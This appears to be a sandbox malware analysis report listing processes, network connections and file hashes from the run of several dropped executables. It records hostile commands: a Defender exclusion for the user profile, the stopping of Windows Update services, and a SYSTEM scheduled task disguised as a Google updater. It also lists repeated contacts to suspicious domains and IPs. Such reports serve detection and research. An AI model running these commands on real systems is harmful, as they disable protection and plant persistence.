C:\Users\Admin\AppData\Local\Temp\forc.exe

"C:\Users\Admin\AppData\Local\Temp\forc.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\1229.exe

C:\Users\Admin\AppData\Local\Temp\1229.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\B688.exe

C:\Users\Admin\AppData\Local\Temp\B688.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\40B8.exe

C:\Users\Admin\AppData\Local\Temp\40B8.exe

C:\Users\Admin\AppData\Local\Temp\456C.exe

C:\Users\Admin\AppData\Local\Temp\456C.exe

C:\Users\Admin\AppData\Local\Temp\4751.exe

C:\Users\Admin\AppData\Local\Temp\4751.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3672 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 121.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 store.steampowered.com udp
US 8.8.8.8:53 steamcommunity.com udp
US 151.101.1.21:443 www.paypal.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 104.244.42.1:443 twitter.com tcp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 1.42.244.104.in-addr.arpa udp
US 157.240.5.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 52.2.199.143:443 www.epicgames.com tcp
US 52.2.199.143:443 www.epicgames.com tcp
US 8.8.8.8:53 35.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 190.218.217.172.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 143.199.2.52.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 63.240.123.52.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 83.39.65.18.in-addr.arpa udp
US 8.8.8.8:53 163.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.54:443 i.ytimg.com tcp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
NL 23.72.252.171:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.72.252.163:80 apps.identrust.com tcp
US 8.8.8.8:53 54.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 171.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 tracking.epicgames.com udp
US 34.195.142.151:443 tracking.epicgames.com tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 151.142.195.34.in-addr.arpa udp
US 8.8.8.8:53 numpersb.fun udp
US 8.8.8.8:53 killredls.pw udp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 abs.twimg.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 57.53.21.104.in-addr.arpa udp
US 104.244.42.66:443 api.twitter.com tcp
US 8.8.8.8:53 126.24.238.8.in-addr.arpa udp
US 8.8.8.8:53 105.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 pbs.twimg.com udp
US 8.8.8.8:53 t.co udp
US 8.8.8.8:53 video.twimg.com udp
US 192.229.220.133:443 video.twimg.com tcp
US 104.244.42.133:443 t.co tcp
US 192.229.233.50:443 pbs.twimg.com tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 66.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 133.220.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 50.233.229.192.in-addr.arpa udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
RU 5.42.92.51:19057 tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 www.paypalobjects.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
RU 5.42.92.190:80 5.42.92.190 tcp
NL 194.169.175.118:80 194.169.175.118 tcp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 104.21.53.57:80 killredls.pw tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 104.21.53.57:80 killredls.pw tcp
US 104.21.53.57:80 killredls.pw tcp
US 194.49.94.80:42359 tcp
US 8.8.8.8:53 80.94.49.194.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
NL 23.72.252.171:443 apps.identrust.com tcp
NL 23.72.252.171:443 apps.identrust.com tcp
US 8.8.8.8:53 fbcdn.net udp
US 157.240.5.35:443 fbcdn.net tcp
NL 23.72.252.171:443 apps.identrust.com tcp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 254.22.238.8.in-addr.arpa udp
US 192.229.221.25:443 www.paypalobjects.com tcp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 api.steampowered.com udp
JP 23.207.106.113:443 api.steampowered.com tcp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 16.64.42.5.in-addr.arpa udp
FI 77.91.68.247:80 77.91.68.247 tcp
US 8.8.8.8:53 247.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 bluepablo.fun udp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 8.8.8.8:53 92.180.67.172.in-addr.arpa udp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.92.51:19057 tcp
US 194.49.94.72:80 194.49.94.72 tcp
US 8.8.8.8:53 72.94.49.194.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe

MD5 34d64b614ac561811e3dc4b6faf41da2
SHA1 3a9f706acbec2e72c2dfec0c69ba4fbf481a9a0f
SHA256 f260cfb9b54af8aaa0fc886a19a43cf1e2349e6fa75236dc4cd3048c4d0f27be
SHA512 346b2f8a1ad3f19af57de53b7ca0823b86d4dd637a54a0771beae105bdc76a0d38961ee808e2ba5508debba22b06e9a6cf555595eec63081d3ff2383fbeaa471

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe

MD5 34d64b614ac561811e3dc4b6faf41da2
SHA1 3a9f706acbec2e72c2dfec0c69ba4fbf481a9a0f
SHA256 f260cfb9b54af8aaa0fc886a19a43cf1e2349e6fa75236dc4cd3048c4d0f27be
SHA512 346b2f8a1ad3f19af57de53b7ca0823b86d4dd637a54a0771beae105bdc76a0d38961ee808e2ba5508debba22b06e9a6cf555595eec63081d3ff2383fbeaa471

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe

MD5 989e7eebe4580a6f4be9d1408b602a31
SHA1 9311ff9f433f34ec776331958efd4c95b4606879
SHA256 4c59cf213e30794433ee2336f6bca10392013f5ebc3929305cf3f96a23dbc534
SHA512 0df1ac02d20f0ee25067c367850191927ae20919bfd45f797ea9a83a00508bb39ba1938e0c45f96bf8c9e37f1682ae33aabe8c70dc4ed619c765ee10bda90f90

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe

MD5 989e7eebe4580a6f4be9d1408b602a31
SHA1 9311ff9f433f34ec776331958efd4c95b4606879
SHA256 4c59cf213e30794433ee2336f6bca10392013f5ebc3929305cf3f96a23dbc534
SHA512 0df1ac02d20f0ee25067c367850191927ae20919bfd45f797ea9a83a00508bb39ba1938e0c45f96bf8c9e37f1682ae33aabe8c70dc4ed619c765ee10bda90f90

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe

MD5 55a302ee103b2ff34631ba4f4e611c04
SHA1 8e3da17a26571ac5d19660d7c798dd24f142b341
SHA256 e634e7fa0f083131f7dc7cc4c75a02a94f6af2cc870fe495fecf59556f31e128
SHA512 ccfa1135f0d42facd884e4114df6c03a09fdca9e2fab1860423a0b397ffb27ceec8c6192a2d5b64a582426969127e83bab67a8da7ae110aa6bb8d540bb41fda6

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe

MD5 55a302ee103b2ff34631ba4f4e611c04
SHA1 8e3da17a26571ac5d19660d7c798dd24f142b341
SHA256 e634e7fa0f083131f7dc7cc4c75a02a94f6af2cc870fe495fecf59556f31e128
SHA512 ccfa1135f0d42facd884e4114df6c03a09fdca9e2fab1860423a0b397ffb27ceec8c6192a2d5b64a582426969127e83bab67a8da7ae110aa6bb8d540bb41fda6

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe

MD5 8596d21ccb2a137cb680e4abef1c8056
SHA1 605c3d149e5b0b11820b0f323b1fd1fc90f9b2eb
SHA256 7e01b10f8709449320738123a66d284cc2e3bfcb0efb27909451c1a3ece57fbb
SHA512 1f4bc050d627e5a8309756b23df100e2e788a21f110d05bc3a2f3f9e369b49571b4aee7707932b501994c65a38e26ba17e19ab9ceef3f21bc46556893ebaffa5

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe

MD5 8596d21ccb2a137cb680e4abef1c8056
SHA1 605c3d149e5b0b11820b0f323b1fd1fc90f9b2eb
SHA256 7e01b10f8709449320738123a66d284cc2e3bfcb0efb27909451c1a3ece57fbb
SHA512 1f4bc050d627e5a8309756b23df100e2e788a21f110d05bc3a2f3f9e369b49571b4aee7707932b501994c65a38e26ba17e19ab9ceef3f21bc46556893ebaffa5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e9a87c8dba0154bb9bef5be9c239bf17
SHA1 1c653df4130926b5a1dcab0b111066c006ac82ab
SHA256 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5
SHA512 bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2ne4059.exe

MD5 7feb147446e769bbfef134d26bb14c1c
SHA1 841a4c4dd25b50f83f45e77c157c593ef1511084
SHA256 626144b212c2add79cb975e3af1cac006991e703c8bd69dbe91459ab1cfcadc0
SHA512 72c5fe8a20dfc172c9639f82b68c1c67a3fe61eee1b2914b9ff03f4333c346a3f4104f76a35f4b9a3f1b522f6c70c42a5a6a41b8720903923d1a4727904e77a9

